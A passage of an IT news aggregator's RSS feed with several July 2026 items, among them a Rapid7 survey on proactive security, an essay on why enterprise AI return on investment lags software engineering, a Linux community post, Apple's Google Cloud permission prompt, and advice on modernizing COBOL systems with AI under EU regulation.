respondents said their security capabilities are only partially integrated. For analysts, partial integration often means more manual work: switching between tools, stitching together context, and making decisions with an incomplete picture. When teams are jumping between systems, manually stitching together context, or working from incomplete data, it becomes harder to act at the speed modern threats demand.</span></p><p><span>The survey also showed that only 10% of respondents describe their organization as “highly proactive” in predicting and preventing threats, which points to the reality of where many teams are today. The ambition is there, but becoming truly preemptive takes time, integration, and operational maturity. Most organizations are still balancing the day-to-day demands of reactive response with the longer-term work of building a more proactive security model.</span></p><p><span>Confidence levels tell a similar story. 59% of respondents said they are only somewhat confident in their organization’s ability to prevent attacks before impact. Security teams understand what is at stake, but many still lack full confidence that they can consistently stop threats before they affect the business.</span></p><h2>AI is a priority, but trust matters</h2><p><span>AI was, of course, another major theme in the survey. Interest is high, especially when it comes to improving efficiency, accelerating triage, and helping teams manage growing volumes of data and alerts, but adoption is still developing. 52% of respondents said AI is in early-stage exploration within their security operations.</span></p><p><span>AI has clear potential in the SOC and across security operations, from summarizing investigations to enriching alerts, supporting prioritization, and helping analysts move faster. But security teams have to be deliberate about how they apply it. In high-pressure environments where accuracy, context, and accountability matter, AI needs to earn trust.</span></p><p><span>The survey results show that trust is still a key consideration. 57% of respondents cited securing AI usage as a top AI and security concern, while 44% cited lack of transparency or trust. These responses reflect a practical mindset. Security leaders are thinking about both sides of AI: how it can help defenders move faster, and how to manage the new risks it introduces. Internally, for AI to become operationally valuable, it has to fit into existing workflows, provide explainable outputs, and support human expertise.</span></p><h2>What security teams want next</h2><p><span>When respondents were asked what is preventing them from becoming more proactive, the top challenges were practical and familiar. 54% cited limited staff or expertise, making capacity one of the biggest barriers to progress. Teams may have the ambition to become more preemptive, but many are already balancing daily alert queues, incident response, vulnerability backlogs, compliance pressure, and business-as-usual security demands.</span></p><p><span>Visibility is another major factor. 31% of respondents cited lack of visibility across the environment as a barrier to becoming more proactive. Without a clear view of assets, identities, exposures, and attacker activity, teams struggle to prioritize what matters most. This is especially important as organizations look to move from broad detection toward more risk-aware, preemptive action.</span></p><p><span>The priorities respondents selected show where they want to go next. 41% selected preemptive security as a top security leadership priority, while improving resilience, strengthening incident response, reducing complexity, and improving risk visibility also appeared as recurring themes.</span></p><p><span>The findings from our Global Security Summit make one thing clear: security teams are ready to move toward more proactive, integrated, and AI-enabled operations, but they need the right visibility, expertise, and confidence to do it well.</span></p><p><span>To hear more from the experts and practitioners who joined us at the summit, catch up on the </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>on-demand sessions</span></a><span>. And to learn how Rapid7 is helping organizations move toward preemptive security, explore </span><a href="https://www.rapid7.com/campaign/managed-detection-and-response/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>Rapid7 Managed Detection and Response</span></a><span>, built to disrupt attackers earlier with broad ecosystem coverage, risk visibility, expert guidance, and an AI-powered SOC.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI ROI gap isn’t a model problem. It’s a workflow problem]]></title>
<description><![CDATA[Anthropic says Claude now writes more than 80% of the code merged at one of the most sophisticated AI companies on the planet. Foundry’s 2026 State of the CIO study says fewer than one in five enterprises can show that their AI initiatives have met or exceeded their ROI goals. Both numbers came o...]]></description>
<link>https://tsecurity.de/de/3653733/it-nachrichten/the-ai-roi-gap-isnt-a-model-problem-its-a-workflow-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653733/it-nachrichten/the-ai-roi-gap-isnt-a-model-problem-its-a-workflow-problem/</guid>
<pubDate>Wed, 08 Jul 2026 11:02:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.anthropic.com/institute/recursive-self-improvement" rel="nofollow">Anthropic says</a> Claude now writes more than 80% of the code merged at one of the most sophisticated AI companies on the planet. Foundry’s <a href="https://www.cio.com/article/4178006/state-of-the-cio-2026-cios-set-the-course-for-ai-roi.html">2026 State of the CIO study</a> says fewer than one in five enterprises can show that their AI initiatives have met or exceeded their ROI goals. Both numbers came out this spring. Both are true. And the distance between them is the most important thing an IT leader can understand about AI right now.</p>



<p>Because that distance isn’t a contradiction, it’s a lesson. And the profession sitting in the middle of it, software engineering, is the canary that explains why so much enterprise AI spend has produced so little measurable return.</p>



<h2 class="wp-block-heading">The report everyone misread</h2>



<p>When Anthropic published its recursive self-improvement piece, plenty of people read it as the starting gun for the job apocalypse. Claude writing its own code, models getting better at building models, humans narrowing toward oversight. If you wanted a headline about the end of the software profession, it was right there.</p>



<p>I read it almost the opposite way. What struck me wasn’t how far AI had come. It was how much had to be true first, even in the one profession built from the ground up to let it succeed.</p>



<p>I made this argument back in my <a href="https://www.cio.com/article/4166029/the-570k-canary-what-ai-coding-agents-reveal-about-enterprise-ais-real-gaps.html">“$570K canary” piece</a>, and the Anthropic data only sharpens it. AI coding agents don’t work because coding models are special. The underlying large language models (LLMs) are the same ones answering support tickets and reviewing contracts. They work because software development already had the infrastructure that makes an agent’s output trustworthy: governance baked into branch protection and code review, observability through version control and CI/CD pipelines, evaluation through automated tests, persistent context through commit history. Developers built all of that for themselves over decades. They didn’t build it for AI. But it turned out to be exactly the scaffolding AI needed.</p>



<p>That’s the part the apocalypse reading skips. Claude’s coding gains are real. They also rode on decades of pre-built substrate. Both things are true at once, and the second one is the one CIOs should be paying attention to when it comes to gains from things like recursive self-improvement.</p>



<h2 class="wp-block-heading">What the CIO data actually shows</h2>



<p>Now hold that next to the State of the CIO numbers. Only 19% of the 662 IT leaders surveyed say their AI initiatives have met or exceeded business goals. Another 18% admit fewer than a third of their use cases are hitting defined expectations.</p>



<p>The easy explanation is that the technology isn’t ready. The data says otherwise. This isn’t for lack of trying, and it isn’t for lack of organizing. Eighty-three percent of respondents have stood up cross-functional steering committees or are about to. Just over half have some form of AI approval process in place, with another quarter building one. Forty-seven percent have formal success metrics, with a third more on the way. The field is pouring effort into the organizational machinery of AI. The ROI still isn’t showing up.</p>



<p>Here’s why I think that is. All of that machinery sits above the work. Steering committees, approval gates and KPI dashboards govern the org chart. But the value, or the leak, happens inside the workflow, at the level of the actual task the AI is doing. You can instrument your governance structure perfectly and still have nothing measuring whether the agent’s output was right at the point where it mattered.</p>



<p>TIAA shows how little the org chart settles. The firm is three years in, runs generative and agentic use cases across fraud detection and call centers, and has 85% of its people on TIAA Gate, its internal platform. It also has the full governance stack most CIOs are still assembling. None of it closed the gap. “You need to understand the full cost of operations,” its chief operating, information and digital officer, Sastry Durvasula told CIO.com, “the efficiencies of running tokens or how you’re handling traffic or RAG.” The structures were never the thing leaking value. The workflow underneath them was.</p>



<p>The barriers respondents named back this up. The top three are lack of in-house expertise (40%), ill-defined ROI metrics (32%) and murky corporate AI strategy (31%). Not one of them is “the model isn’t good enough.” And according to the full Foundry report, the expertise gap is deepest in healthcare (52%), retail (51%) and manufacturing (49%), the sectors whose core work looks least like a software development lifecycle. That’s consistent with substrate being the real variable, though a tighter market for AI talent in those industries is surely part of the story too.</p>



<h2 class="wp-block-heading">The market is already voting</h2>



<p>Look at where the AI is actually being pointed, and you’ll see enterprises sequencing by substrate even though nobody’s calling it that. Three-quarters of both IT leaders and line-of-business respondents say AI is primarily being used to automate internal processes rather than customer-facing applications.</p>



<p>That’s not timidity. It’s instinct pointing at the right thing. Internal processes are the ones with structured, observable workflows and users who tolerate a little friction. Customer-facing work is where the trust gaps are still wide open and the cost of a wrong answer is asymmetric. A bad internal draft gets fixed before anyone sees it. A bad customer answer is the whole ballgame.</p>



<p>I’ll be honest about a wrinkle in the data here, because a careful reader will catch it. The same study reports a near-mirror finding, that 66% to 69% of respondents say the bulk of their current AI work is customer-facing. The two stats sit a paragraph apart in the CIO study and almost certainly reflect how the question was framed rather than a real reversal. But the synthesis holds either way: even where customer-facing work is being attempted, it’s where ROI is least realized. The work that lands is the work with the substrate underneath it. The split only reinforces the point.</p>



<h2 class="wp-block-heading">Sequence by readiness, not by ambition</h2>



<p>So, here’s the prescription, and it cuts against the instinct most AI strategies are built on. Stop sequencing your AI portfolio by where the value looks biggest. Start sequencing it by where the work already has, or can be given, a structured workflow with a usable signal for whether the output was right.</p>



<p>The study itself shows what the alternative looks like. Andrea Ballinger, CIO at Rensselaer Polytechnic Institute, described the trap precisely. No one measures ROI on an ongoing basis, she said, “because we are facing counterpressures from every vice president and line-of-business domain looking to implement AI for their own optimization.” The result: “We are saying yes to everyone without stepping back and focusing on the business cases that show real value.” That’s value-led sequencing under pressure from every budget-holder in the building, and it’s exactly how you end up with a sprawling pipeline of pilots and a 19% success rate.</p>



<p>The counterexample comes from the same study. Thomas Prommer, a longtime CTO, CIO and CAIO, funds outcomes instead of deliverables. “We don’t fund ‘build a model,’ we fund ‘reduce returns by 8% on this category’ with checkpoints at 90, 180 and 270 days,” he explained. He kills any project that misses two checkpoints, “roughly a third of what we start, and that’s healthy.” Read that through the substrate lens and you see what he’s really doing. He’s manufacturing a correctness signal where the work didn’t come with one. He’s building the missing piece of scaffolding by hand.</p>



<p>That gives you a simple lens to run any candidate use case through. Does the work break into discernible stages? Can you observe what happens at each one? Is there a usable signal for whether the result was right? Score high on all three and you have a software-engineering-shaped problem, so go now. Score low and you have a choice: build the substrate first or wait. What you shouldn’t do is fund it at scale and hope the ROI materializes, because that’s the pile the 19% number is built on.</p>



<h2 class="wp-block-heading">The hard part, and the honest caveat</h2>



<p>Run the professions through that lens and they sort themselves. Finance is the closest cousin to software. Reconciliation, close processes, approval chains and audit trails already give you staged work with a clear “it reconciles or it doesn’t” signal, which is part of why financial services sits among the sectors furthest along with AI. Legal and medicine are harder. The workflow shell exists, intake to redline to filing, diagnosis to treatment to follow-up, but the correctness signal at the core is weak, delayed or confounded. You can automate the routine staged parts and you hit a wall at the judgment that defines the profession.</p>



<p>And that’s the caveat that keeps this honest. A structured workflow isn’t always buildable in software’s image. For the judgment core of some professions, the substrate is years out no matter how good the model gets or how mature your governance becomes. Anyone selling you a tighter timeline than that is selling.</p>



<p>But notice what this reframe does. It turns “our AI ROI is elusive” from a mystery you wait out into a sequencing-and-instrumentation problem you can actually test. Your timeline isn’t set by how smart the next model is. It’s set by how fast you build the substrate for your own domain, and that’s within your control.</p>



<h2 class="wp-block-heading">The two numbers, reconciled</h2>



<p>Put the 80% and the 19% back next to each other and they stop looking like a paradox. Software engineering didn’t win because its models were better than everyone else’s. It won because the work was already shaped to let an agent succeed, and the scaffolding that makes agent output trustworthy had been in place for decades before the agent showed up.</p>



<p>The question for the rest of the enterprise was never really whether AI can do the work. It’s whether your work is shaped so AI’s output can be trusted. That’s not something you wait for. It’s something you build.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[If Linux advocates freedom then why some users are being judged for using proprietary software?]]></title>
<description><![CDATA[Hi, I use Arch btw I prefer FOSS much much more than proprietary bloat if able. After all, proprietary software have concerns about security, transparency, or even privacy. However, this is a reality, FOSS and proprietary software still need to co-exist each other. This is how the world runs. To ...]]></description>
<link>https://tsecurity.de/de/3653164/linux-tipps/if-linux-advocates-freedom-then-why-some-users-are-being-judged-for-using-proprietary-software/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653164/linux-tipps/if-linux-advocates-freedom-then-why-some-users-are-being-judged-for-using-proprietary-software/</guid>
<pubDate>Wed, 08 Jul 2026 05:22:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi, I use Arch btw</p> <p>I prefer FOSS much much more than proprietary bloat if able. After all, proprietary software have concerns about security, transparency, or even privacy. However, this is a reality, FOSS and proprietary software still need to co-exist each other. This is how the world runs. To give you examples: proprietary Nvidia driver for gaming, wifi/bluetooth driver or even Steam to launch Steam games.</p> <p>Now, we may criticize software (FOSS or proprietary) however we want. I in particular is big tech hater and I still hate Nvidia for making Linux unnecessarily complicated. But this is not what we are talking about here.</p> <p>What I am here for is: when users are being judged for using proprietary software out of necessity or just a matter of preferences. <strong>That's just toxic and condescending.</strong> We are not improving the situation of forced ecosystem or vendor locked down by shaming users. In fact, we are making it worse. </p> <p>So instead of shaming them, you should <strong>encourage</strong> (not force) them to use FOSS alternatives. The more people using FOSS, the more gravity effect is taking place. More users = more feedback = more improvement = more contributors. <strong>And when FOSS alternative is prominent enough to make proprietary software obsolete, that's where we win here.</strong></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/tungnon"> /u/tungnon </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uqgwjp/if_linux_advocates_freedom_then_why_some_users/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uqgwjp/if_linux_advocates_freedom_then_why_some_users/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple intros permission popup for AI features sending data to Google Cloud in iOS 27 and iOS 26]]></title>
<description><![CDATA[Apple is enhancing transparency by adding a new user permission popup that notifies and seeks consent before sending data to Google Cloud…
The post Apple intros permission popup for AI features sending data to Google Cloud in iOS 27 and iOS 26 appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3652213/ios-mac-os/apple-intros-permission-popup-for-ai-features-sending-data-to-google-cloud-in-ios-27-and-ios-26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652213/ios-mac-os/apple-intros-permission-popup-for-ai-features-sending-data-to-google-cloud-in-ios-27-and-ios-26/</guid>
<pubDate>Tue, 07 Jul 2026 18:40:02 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Apple is enhancing transparency by adding a new user permission popup that notifies and seeks consent before sending data to Google Cloud…</p>
<p>The post <a href="https://macdailynews.com/2026/07/07/apple-intros-permission-popup-for-ai-features-sending-data-to-google-cloud-in-ios-27-and-ios-26/">Apple intros permission popup for AI features sending data to Google Cloud in iOS 27 and iOS 26</a> appeared first on <a href="https://macdailynews.com/">MacDailyNews</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What has happened since the EU Pay Transparency Act came into effect?]]></title>
<description><![CDATA[In the weeks since the EU Pay Transparency rules came into full effect, how have organisations responded to the change?
Read more: What has happened since the EU Pay Transparency Act came into effect?]]></description>
<link>https://tsecurity.de/de/3651762/it-nachrichten/what-has-happened-since-the-eu-pay-transparency-act-came-into-effect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651762/it-nachrichten/what-has-happened-since-the-eu-pay-transparency-act-came-into-effect/</guid>
<pubDate>Tue, 07 Jul 2026 16:04:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In the weeks since the EU Pay Transparency rules came into full effect, how have organisations responded to the change?</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/careers/eu-pay-transparency-act-europe-report-mokaru-working-life-equality">What has happened since the EU Pay Transparency Act came into effect?</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Radware updates Agentic AI Protection with AI governance and compliance capabilities]]></title>
<description><![CDATA[Radware has announced enhancements to its Agentic AI Protection solution to help organizations govern and secure AI agents across enterprise environments. The release adds compliance reporting to support alignment with leading global AI standards, enhanced visibility into agent ecosystems, and pr...]]></description>
<link>https://tsecurity.de/de/3651328/it-security-nachrichten/radware-updates-agentic-ai-protection-with-ai-governance-and-compliance-capabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651328/it-security-nachrichten/radware-updates-agentic-ai-protection-with-ai-governance-and-compliance-capabilities/</guid>
<pubDate>Tue, 07 Jul 2026 13:24:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Radware has announced enhancements to its Agentic AI Protection solution to help organizations govern and secure AI agents across enterprise environments. The release adds compliance reporting to support alignment with leading global AI standards, enhanced visibility into agent ecosystems, and protection for developer-hosted AI agents, including Anthropic Claude Code. As enterprises scale their use of AI agents, they are facing growing pressure from both security teams and regulatory bodies to demonstrate control, transparency, and accountability … <a href="https://www.helpnetsecurity.com/2026/07/07/radware-agentic-ai-protection-enhancements/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/07/radware-agentic-ai-protection-enhancements/">Radware updates Agentic AI Protection with AI governance and compliance capabilities</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Beta 3 Makes AirPods Adaptive Mode Easier to Control]]></title>
<description><![CDATA[iOS 27 beta 3 adds a new AirPods Listening Mode setting that makes Adaptive mode easier to adjust from the main AirPods menu in Settings.




https://twitter.com/aaronp613/status/2074259729602285669




With this change, users can open Settings, tap their connected AirPods, and see the usual List...]]></description>
<link>https://tsecurity.de/de/3651072/ios-mac-os/ios-27-beta-3-makes-airpods-adaptive-mode-easier-to-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651072/ios-mac-os/ios-27-beta-3-makes-airpods-adaptive-mode-easier-to-control/</guid>
<pubDate>Tue, 07 Jul 2026 11:55:25 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[iOS 27 beta 3 adds a new AirPods Listening Mode setting that makes Adaptive mode easier to adjust from the main AirPods menu in Settings.




https://twitter.com/aaronp613/status/2074259729602285669




With this change, users can open Settings, tap their connected AirPods, and see the usual Listening Mode options, including Off, Transparency, Adaptive, and Noise Cancellation. When they choose Adaptive, iOS now shows small controls on both sides of the option, which lets them make the blend lighter or stronger without opening a separate Bluetooth settings page.



What changed in Adaptive mode



Adaptive mode combines Active Noise Cancellation and Transparency mode, so AirPods can adjust outside sound based on the user’s surroundings. The new control gives users a faster way to decide how much ambient noise they want to hear while using Adaptive mode.



However, the setting still does not offer a free slider for exact control. Users can keep the default level or tap either side for a stronger or lighter effect.



Since this feature arrived in beta, Apple can still change or remove it before the public iOS 27 release.]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizing legacy IT with AI without triggering regulatory risk]]></title>
<description><![CDATA[AI is accelerating modernization projects that previously required months of analysis. But in highly regulated organizations, an uncomfortable reality quickly emerges: The risk is no longer in converting the code, but in demonstrating that the new version still does exactly what the old one did.
...]]></description>
<link>https://tsecurity.de/de/3651034/it-security-nachrichten/modernizing-legacy-it-with-ai-without-triggering-regulatory-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651034/it-security-nachrichten/modernizing-legacy-it-with-ai-without-triggering-regulatory-risk/</guid>
<pubDate>Tue, 07 Jul 2026 11:36:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI is accelerating modernization projects that previously required months of analysis. But in highly regulated organizations, an uncomfortable reality quickly emerges: The risk is no longer in converting the code, but in demonstrating that the new version still does exactly what the old one did.</p>



<p>Almost every management committee has made the same decision this year: to apply artificial intelligence to their systems. And almost all discover the same thing when they delve into the details: AI is easy to add to the periphery — a chatbot, a copilot, a dashboard — and very difficult to integrate where it really matters, which is the legacy core. In banking, insurance, and much of the public sector, that core is still COBOL on a mainframe, with decades of patches and documentation that, to put it mildly, is incomplete.</p>



<p>That’s precisely where the regulatory risk lies. And that’s where most projects go off the rails.</p>



<p>I’ve spent three decades in regulated sectors, and the pattern repeats itself. The IT team approaches modernization as a delivery problem — deliver quickly, close tickets, move to production — when in a regulated sector, the problem is compliance. Success isn’t measured by what you deliver, but by what you can defend. Changing that mindset is half the battle.</p>



<h2 class="wp-block-heading">The mirage of COBOL translated</h2>



<p>The promise is enticing. Today, a language model can read thousands of lines of COBOL, document them, explain them, and propose an equivalent in Java or Python in a fraction of the time it would take a human team. It works. I’ve seen it accelerate analyses that previously took weeks.</p>



<p>The problem isn’t the code. The problem is the business rules that no one ever wrote down. In a migration project in a highly regulated banking environment, the biggest risk wasn’t in the routines, but in a calculation exception that had been running for 15 years and wasn’t documented anywhere: It existed only in the code and in the mind of a now-retired analyst. When you ask a model to “translate” that, it doesn’t translate; it fills in the gap with what statistically seems correct. And it does so with impeccable certainty.</p>



<p>On a dashboard, a hallucination is a troublesome error. In a financial institution’s calculation engine, it’s a compliance incident, a customer complaint, and potentially a penalty from the regulator.</p>



<p>The temptation, precisely because the tool is so fast, is to skip the slow part: reconstructing that logic with someone who understands it. That’s the worst possible decision. The speed of AI is seductive precisely at the point where making a mistake is most costly.</p>



<h2 class="wp-block-heading">What the regulator expects — and what changed in May</h2>



<p><a href="https://www.csoonline.com/article/570091/eus-dora-regulation-explained-new-risk-management-requirements-for-financial-firms.html">DORA</a> has been in effect since January 2025 and is very clear: operational resilience, ICT asset management, business continuity, and third-party risk control. Modernizing the core addresses all four areas simultaneously. NIS2 adds the security and notification layer. And the AI ​​Regulation introduces its own framework when the system you deploy is high-risk.</p>



<p>Although DORA, <a href="https://www.csoonline.com/article/3568787/eus-nis2-directive-for-cybersecurity-resilience-enters-full-enforcement.html">NIS2</a>, and the EU AI ​​Regulation pursue different objectives, they share a common requirement: the ability to demonstrate control, traceability, and accountability over deployed systems. This is the link between the three frameworks, and it’s what a modernization project must protect from day one.</p>



<p>It’s important to clear up a recent misunderstanding here. With the <a href="https://data.europa.eu/en/news-events/news/eu-digital-omnibus-update-simplifying-europes-digital-rulebook" target="_blank" rel="nofollow">Digital Omnibus</a> agreement of May 2026, the high-risk obligations of Annex III are postponed until December 2027. Many executives have interpreted the headline — “EU delays AI Law” — as a reprieve. This is a dangerous interpretation. Transparency obligations still apply in August 2026, synthetic content marking comes into effect in December 2026, and, most importantly, the underlying risk remains unchanged. An erroneous automated decision in 2026 still falls under the GDPR, under sector-specific regulations, and under the jurisdiction of the relevant supervisor. The deadline has been moved; the responsibility has not.</p>



<h2 class="wp-block-heading">How to do it without triggering the risk</h2>



<p>I don’t have a magic formula, but I do have five principles that I apply to every project of this type:</p>



<ol class="wp-block-list">
<li><strong>Inventory before modernizing.</strong> You can’t secure or migrate what hasn’t been mapped. Assets, dependencies, data flows: If that map doesn’t exist, the first deliverable of the project is to build it, not write code.</li>



<li><strong>The AI </strong><strong>​​proposes, a person validates.</strong> The model accelerates the analysis and the first draft of the transformation. The critical business rule is confirmed by an engineer who understands the business, not the model. Where there is no one who understands it, it is reconstructed with the business area before anything is changed.</li>



<li><strong>End-to-end traceability.</strong> Every AI-generated transformation must be recorded: what went in, what went out, who approved it, and why. That’s not bureaucracy; it’s exactly what the auditor will ask for, and it’s what makes a change defensible.</li>



<li><strong>Be careful where you put the code.</strong> Dumping kernel source code into an external model is a data transfer and a confidentiality issue more than a technical one. DORA requires control over the third party; GDPR requires control over the data. This decision is made at the beginning of the project, not after it’s finished.</li>



<li><strong>Govern shadow AI.</strong> If the organization doesn’t offer a safe way to use AI, teams will use it anyway, on their own and without oversight. Governance isn’t about prohibition but about providing an enabled path.</li>
</ol>



<h2 class="wp-block-heading">Technological leadership has changed</h2>



<p>In a regulated sector, the CIO’s challenge is no longer simply to modernize legacy systems, but to do so in a way that withstands the scrutiny of auditors, regulators, and risk committees.</p>



<p>Leading one of these projects is no longer about coordinating deliveries; it’s about making the transformation defensible. It means saying no to a shortcut that would save two weeks but leave a gap without traceability. It means treating governance as an accelerator — because a well-documented change is approved faster — and not a brake.</p>



<p>AI is an extraordinary tool for organizations to overcome their legacy technical debt. But in banking, insurance, or public administration, uncontrolled speed is not an advantage: It’s a liability that surfaces at first inspection. Modernizing quickly can be a competitive advantage; modernizing with traceability, control, and defense capabilities is what makes it sustainable.</p>



<p>Therefore, I summarize what I’ve learned over the years as the following: A secure solution isn’t the slowest or the most expensive; it’s the one that survives the first audit.</p>



<p><em><a href="https://joseenrique.es/" rel="nofollow">José Enrique Ibarra</a> is Interim CIO and AI Project Manager, with three decades of experience leading IT in regulated sectors—banking, insurance, energy, and public administration. His focus is on governing digital transformation and AI adoption under the AI </em><em>​​Regulation, DORA, NIS2, GDPR, ISO 27001, and the Spanish National Security Framework (ENS), ensuring it withstands the scrutiny of auditors and regulators. He leads AI Forge, his applied AI initiative. He resides in Almería.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Adds New Google Cloud Permission Prompt for Apple Intelligence Features]]></title>
<description><![CDATA[Apple is adding a new permission prompt in iOS 27 and iOS 26 for some AI features that send user data to Google Cloud. The prompt tells users when a request needs Google’s servers and asks for permission before the feature continues.



What the New AI Prompt Says



The new prompt appears in AI-...]]></description>
<link>https://tsecurity.de/de/3650497/ios-mac-os/ios-27-adds-new-google-cloud-permission-prompt-for-apple-intelligence-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650497/ios-mac-os/ios-27-adds-new-google-cloud-permission-prompt-for-apple-intelligence-features/</guid>
<pubDate>Tue, 07 Jul 2026 06:53:43 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple is adding a new permission prompt in iOS 27 and iOS 26 for some AI features that send user data to Google Cloud. The prompt tells users when a request needs Google’s servers and asks for permission before the feature continues.



What the New AI Prompt Says



The new prompt appears in AI-powered tools such as shape generation in iWork on iOS 26 and similar AI features in Freeform on iOS 27. This shows that Apple has already started using the new cloud setup in current apps while preparing a wider rollout with iOS 27.



Apple launched Private Cloud Compute with Apple Intelligence in 2024 and promoted it as a secure way to process AI requests in the cloud. At that time, Apple said the system ran on Apple’s own servers, which helped build trust around its privacy claims.



Now, Apple says some new AI models were made in collaboration with Google and run through Google Cloud while still using Private Cloud Compute protections. The company says this setup uses isolated processes, short-lived inference software, and protected keys inside confidential virtual machines.



For users, the main change is transparency. Apple now shows a popup before sending certain AI requests to Google Cloud, so people can decide whether they want to continue.



This does not mean every Apple Intelligence feature uses Google Cloud. It applies to selected new and upcoming AI tools that need this extra processing support. Apple still presents the system as privacy-focused, but the new prompt makes the cloud provider clearer to users.]]></content:encoded>
</item>
<item>
<title><![CDATA[Breach Transparency: Warum Governance bei Sicherheitsvorfällen scheitert]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Eine neue Auswertung zum Sicherheitsmanagement zeigt: Viele Organisationen erkennen Risiken sehr gut, scheitern aber bei der Umsetzung – besonders bei der Frage, wie über Sicherheitsvorfälle transparent berichtet wird. In einer Befragung von 1.200 IT- und Security-...]]></description>
<link>https://tsecurity.de/de/3650493/it-security-nachrichten/breach-transparency-warum-governance-bei-sicherheitsvorfaellen-scheitert/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650493/it-security-nachrichten/breach-transparency-warum-governance-bei-sicherheitsvorfaellen-scheitert/</guid>
<pubDate>Tue, 07 Jul 2026 06:52:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-breach-transparency-governance-incident-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Eine neue Auswertung zum Sicherheitsmanagement zeigt: Viele Organisationen erkennen Risiken sehr gut, scheitern aber bei der Umsetzung – besonders bei der Frage, wie über Sicherheitsvorfälle transparent berichtet wird. In einer Befragung von 1.200 IT- und Security-Fachkräften sagten über die Hälfte der Betroffenen, ihnen sei Vertraulichkeit angeordnet worden. Dadurch entsteht […]</p>
<div><a href="https://www.it-boltwise.de/breach-transparency-warum-governance-bei-sicherheitsvorfaellen-scheitert.html">... den vollständigen Artikel <strong>»Breach Transparency: Warum Governance bei Sicherheitsvorfällen scheitert«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/breach-transparency-warum-governance-bei-sicherheitsvorfaellen-scheitert.html">Breach Transparency: Warum Governance bei Sicherheitsvorfällen scheitert</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Beta 3: Here Are All the New Features Apple Added]]></title>
